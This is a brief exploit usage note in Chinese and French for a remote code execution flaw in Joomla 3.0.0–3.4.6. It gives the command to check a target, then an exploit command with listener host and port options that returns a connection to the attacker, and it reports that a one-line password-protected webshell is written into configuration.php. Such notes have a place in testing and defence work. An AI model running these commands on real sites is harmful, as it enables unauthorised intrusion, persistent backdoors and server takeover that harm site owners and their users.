
影响范围:3.0.0-3.4.6
Versions concernées : 3.0.0-3.4.6
python3 Joomla-3.4.6-RCE.py -t http://172.20.10.4
L'affichage de « Vulnerable » confirme la présence de la vulnérabilité
python3 test.py -t http://127.0.0.1:8080/ --exploit --lhost 192.168.31.126 --lport 2121
Exécution réussie
Et écrit un webshell d'une ligne avec un mot de passe aléatoire dans « configuration.php »